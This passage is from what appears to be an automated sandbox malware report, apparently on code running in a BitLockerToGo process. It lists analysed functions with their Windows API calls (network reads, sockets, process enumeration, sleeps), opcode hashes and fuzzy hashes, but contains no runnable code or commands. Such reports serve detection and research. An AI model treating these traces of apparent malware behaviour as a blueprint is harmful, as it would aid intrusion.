                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: ef51f9d4478233b5930e2483dad09de1574fe72aaa027e2c637d6ac8f4ca36bc
                                                                                                                                                                                                                                      • Instruction ID: cc22e2f7968f32b449cf70b61e0df96c5056e77e4b41c8a141147d8e06d6af05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef51f9d4478233b5930e2483dad09de1574fe72aaa027e2c637d6ac8f4ca36bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3E012B2B0215A9BEB48CB65DC91E9E737AFB55304B09802CA506A7250F930AD51CB90
                                                                                                                                                                                                                                      Function 00484F86 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00484F9F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                                                                                                                      • Opcode ID: 58f1dbef93c033262181359bda6012ee6391456df1aa74c53155996cdc6ab97c
                                                                                                                                                                                                                                      • Instruction ID: e61b84c9cd6cea9d38631e8428d7c97e5f52004528c7a5e23e98fb0bda78b307
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58f1dbef93c033262181359bda6012ee6391456df1aa74c53155996cdc6ab97c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE0C231B241119FD344EB94DC84D0677B6ABD47043048438A401DB358E231AD01CB54
                                                                                                                                                                                                                                      Function 004A0268 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Process32Next.KERNEL32(?,?), ref: 004A027D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NextProcess32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1850201408-0
                                                                                                                                                                                                                                      • Opcode ID: 120b39313d4d3d814faf6f4c3f1eb6292cd494fae671aa9fb86eb96f923c122a
                                                                                                                                                                                                                                      • Instruction ID: d360ca7354361639d42b3d1685163e840435a8646b6c89bcc36568e4646ed70c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 120b39313d4d3d814faf6f4c3f1eb6292cd494fae671aa9fb86eb96f923c122a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51E017B67002419FDB4CDB59DCA1F6672E1A798200F04083CE916CB3A0FB38DD049B18
                                                                                                                                                                                                                                      Function 004A3646 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NextProcess32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1850201408-0
                                                                                                                                                                                                                                      • Opcode ID: 592bd48cd2a0b6e34e121c19d9e7d9c633f1b90976d2857e14e0a2ada56a9691
                                                                                                                                                                                                                                      • Instruction ID: d96b9cd4d29408eee4d8422d94970a92c7abb176cc3dc813b643134f96da55d1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 592bd48cd2a0b6e34e121c19d9e7d9c633f1b90976d2857e14e0a2ada56a9691
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBD05B30302101EB8358CF0DCD41D55B3D6AFC6249354856CF005CB346E775DE168759
                                                                                                                                                                                                                                      Function 00489C5B Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00489C6D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: socket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 98920635-0
                                                                                                                                                                                                                                      • Opcode ID: 3b826ebe3231b696d208336b00f9e7e56094b6909b9c71a06c692e39025ee882
                                                                                                                                                                                                                                      • Instruction ID: aa995a066cf7012e788787d5b7c09606f99a0ed1355bead0f2251b59c9fec26c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b826ebe3231b696d208336b00f9e7e56094b6909b9c71a06c692e39025ee882
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D05B30380550D7D7289799DCD5F1562036FC0768F684529A52ABF3D1C2A55C514744
                                                                                                                                                                                                                                      Function 0048A448 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00001000,00000000), ref: 0048A45B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: recv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1507349165-0
                                                                                                                                                                                                                                      • Opcode ID: 1494a84613130eba17c9b0ce4674778732407a042b7bdb10eef16e887c009e9f
                                                                                                                                                                                                                                      • Instruction ID: 18bc9ffdefa52afd3200fe20c7339f64e93506ce37c4607bff1ac5c69194c617
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1494a84613130eba17c9b0ce4674778732407a042b7bdb10eef16e887c009e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDD05E30340501E7DB68CB09CC94F267692EFC4788F14803CE25A962E5C524EC56CA48
                                                                                                                                                                                                                                      Function 004A351E Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NextProcess32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1850201408-0
                                                                                                                                                                                                                                      • Opcode ID: d9f6ae57a8f27197c7e98a2e52d92be611fc3824802979326fa4162ff5500cf5
                                                                                                                                                                                                                                      • Instruction ID: eecb5c0230fab3cc56e5c2a7bd64181ad7ea85bbc74109ecddb979e0d10f49dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9f6ae57a8f27197c7e98a2e52d92be611fc3824802979326fa4162ff5500cf5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15D0C9B13510059FE798CB1EDCB2FA922D5EB88304F41043CE905C3391EA29EC004A69
                                                                                                                                                                                                                                      Function 004A3348 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NextProcess32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1850201408-0
                                                                                                                                                                                                                                      • Opcode ID: 547083c625537a16de919361bdd9c9fef14f4d50f9ba29794f3f1c7fbece5d1a
                                                                                                                                                                                                                                      • Instruction ID: 0999a17bd5228b18e487379d02a364a2ae8cb7e5dbcef9cdf50f4ec022155331
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 547083c625537a16de919361bdd9c9fef14f4d50f9ba29794f3f1c7fbece5d1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD012303010459FE7D4CB2ECCA1F4533D5EB85308F050038B645C7391DA28D9048718
                                                                                                                                                                                                                                      Function 0048B9F7 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                      • Opcode ID: e8e7f027813d63dea13314e001e29fbdbfd821b984b2fa21c6baf0ea24e31201
                                                                                                                                                                                                                                      • Instruction ID: c34ba86fc8767841712e3203f8ff99c1c7d74ab26eaa865edc6cca8da6fa2d27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e7f027813d63dea13314e001e29fbdbfd821b984b2fa21c6baf0ea24e31201
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B401A472E016069BC740DF7CDD41999B7B0FF966547188614EC15E7311EB30EBA1CB86
                                                                                                                                                                                                                                      Function 0048BD06 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0048BD26
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                                                                                      • Opcode ID: 8c11f1c9c55a568d8724ade6ad4d4ce61f530085224a22998601bab7b7a6ad93
                                                                                                                                                                                                                                      • Instruction ID: 7503bbf2f82e80b90dc97d9baee9f8a8f8d83a6c83abe4bb9bb4782c14a76338
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c11f1c9c55a568d8724ade6ad4d4ce61f530085224a22998601bab7b7a6ad93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0A5743012059FDB89DF68C8E1F2537A2FB89318F148468ED49CB3A6DA35E815CB14
                                                                                                                                                                                                                                      Function 004A813D Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                      • Opcode ID: ac8aeb31c48f71df50e333d3d65db1f84c76d328160847b7bbde50f603b37a91
                                                                                                                                                                                                                                      • Instruction ID: 885d16bb7468cf0626feccfa90cbf7f899e485bfb87ea01e4ae265ff3dbb1fe7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac8aeb31c48f71df50e333d3d65db1f84c76d328160847b7bbde50f603b37a91
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CD017726022088BE754DF48DDD179E3362EB85308F104076EB15873A1CA756E818788
                                                                                                                                                                                                                                      Function 004ACF30 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                      • Opcode ID: e68df729846793c48d3e0339634b32c56fc4a6e08e4d17a8fdedf33852b5bd9a
                                                                                                                                                                                                                                      • Instruction ID: e36e92f3da771438ff59be0f161689b1f60ffe6e63cadce503647db1d1360196
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e68df729846793c48d3e0339634b32c56fc4a6e08e4d17a8fdedf33852b5bd9a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E0EC71A41080CFC24CDB14D8D4F6473A2AB98301B614255E226476E1DF36AD44DB2C

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 0049E0E1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c70db950daa65f1699921c98be4a3ebd010613ea7a7933fecb80d55968a798c7
                                                                                                                                                                                                                                      • Instruction ID: d93ebc8e010590cfb89f495b488e6c9fb589d5099bd8586bcbc6c3eaaf98c1ef
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c70db950daa65f1699921c98be4a3ebd010613ea7a7933fecb80d55968a798c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E341FF4800E2E049CB1B877501A45A2BFE25CAF00D37ED5DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 0049A441 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f5f43ecc240c5fcaf5ffd26f8fca8019fe5b96580077afcac5958af3e746cb2f
                                                                                                                                                                                                                                      • Instruction ID: 4f98a6e12af7a3cbae3e002f35cc41ced5107c6db3c1bb150c7edace890690aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5f43ecc240c5fcaf5ffd26f8fca8019fe5b96580077afcac5958af3e746cb2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C741124800E2E049CB57873500A45A2BFE25CAF00D3AED1DED4E80E7A7C19BC65FDB62
                                                                                                                                                                                                                                      Function 004988E1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bb9a58c9e1d93afaf7fa645d56d32acda8a68f278d919c3befd0ddad0841f9bf
                                                                                                                                                                                                                                      • Instruction ID: b8dac9664b46cd85caa443b41a77a9eb015cde05eb15231b3c79c9783fdac32f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb9a58c9e1d93afaf7fa645d56d32acda8a68f278d919c3befd0ddad0841f9bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5041F24800E2E049CB1B877501A45A2BFE25CAF00D37ED5DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 00483AB1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6c1f2f5178ebfd8dc9679fa7361210937532750d7c4448c62839d9b289230d87
                                                                                                                                                                                                                                      • Instruction ID: a0aabbab98e7b7e1efe2a98f603bf0e14db21c39a99aac730df6e66f69a74c6e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c1f2f5178ebfd8dc9679fa7361210937532750d7c4448c62839d9b289230d87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841F34800E2E049CB1B477501A45A2BFE25CAF00D37ED5DED4D80E7A7C19BC69BDB66
                                                                                                                                                                                                                                      Function 0049BBA1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 21314935e1be0663d206d424089efdce6b3f06abebfe644ce85a6528b8815ae9
                                                                                                                                                                                                                                      • Instruction ID: c232891099cf527965e0663fe8caee584f8650ad5f4637aa9e8bd05a5dd96e4e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21314935e1be0663d206d424089efdce6b3f06abebfe644ce85a6528b8815ae9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F41F24800E2E049CB1B877501A45A2BFE25CAF00D37ED5DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 004A3CE1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a4be76e077715c2fa528f8d61f6059476fe1421eeb8e007670754e716c309954
                                                                                                                                                                                                                                      • Instruction ID: 6f1c098867600373c419c95f7db86f11875dad85ff877a3073710cb4a6046c0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4be76e077715c2fa528f8d61f6059476fe1421eeb8e007670754e716c309954
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D441F34800E2E049CB1B477500A45A2BFE25CAF00D37ED5DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 004A3DF1 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bcded886c9d56128bce19dd19109f8b75e0bab797ba5f2f484bee6d34fde9e61
                                                                                                                                                                                                                                      • Instruction ID: 22023eab149c675cb1e00c36147d14af9b03e31760d466e3b88dbfc9a0c5dc59
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcded886c9d56128bce19dd19109f8b75e0bab797ba5f2f484bee6d34fde9e61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41E34800E2E049CB1B877500A45A2BFE25CAF00D37ED5DED4D80E7A7D19BC65BEB66
                                                                                                                                                                                                                                      Function 004B2081 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d1648bdc0ba092c9fc56005e5ebd234c32486b01d236704d78d17c70d7e4d5ee
                                                                                                                                                                                                                                      • Instruction ID: ab06fde7c23d7583b43e52eea617405769b035a0ead3eddbb52387d793e464b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1648bdc0ba092c9fc56005e5ebd234c32486b01d236704d78d17c70d7e4d5ee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A41FF4800E2E049CB17877500A45A2BFE25CAF00D36ED1DED4D80E7A7C19BC65BEB66
                                                                                                                                                                                                                                      Function 004A38F1 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8ea7a42f2dcfffe432cb75fdfef48bdd25f5a9c65ea7bcb3f41878c705539b4b
                                                                                                                                                                                                                                      • Instruction ID: fcbc7f91085f66e496eccaf9f2634c75025759e9fc70ec4efb929b896ec352fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea7a42f2dcfffe432cb75fdfef48bdd25f5a9c65ea7bcb3f41878c705539b4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D41124810E2E048CB57473500A45A2BFE25CAF00D3AED1DED4D80E7A7C19BC65FEB66
                                                                                                                                                                                                                                      Function 004A4071 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8553ac14d9a1a9be538e35bc665450fde344f9d68651b049a12730e320443060
                                                                                                                                                                                                                                      • Instruction ID: 3779992b7c28d8b99907d3d3c08ae0f073f379a18597a6e92b949e3eecdf2924
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8553ac14d9a1a9be538e35bc665450fde344f9d68651b049a12730e320443060
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31ED4800E2E049CB1B8B3500A45A2BFE25CAF00D36ED5DED4D80E7A7C15BC65BEB76
                                                                                                                                                                                                                                      Function 004AF211 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 57bfe38bf227d095596d07fec150fe253bd9c7b2e7abf0347a8af5e528551edc
                                                                                                                                                                                                                                      • Instruction ID: b02990b5b04b389a5b1b52bee6926a679f055ca2b8509b5f12fc968fdb296721
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57bfe38bf227d095596d07fec150fe253bd9c7b2e7abf0347a8af5e528551edc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231F24900E2E048CB1B473501A45A2BFE25CAF00D36ED5DED4D80E7A7C15BC69BEB66
                                                                                                                                                                                                                                      Function 004AF301 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
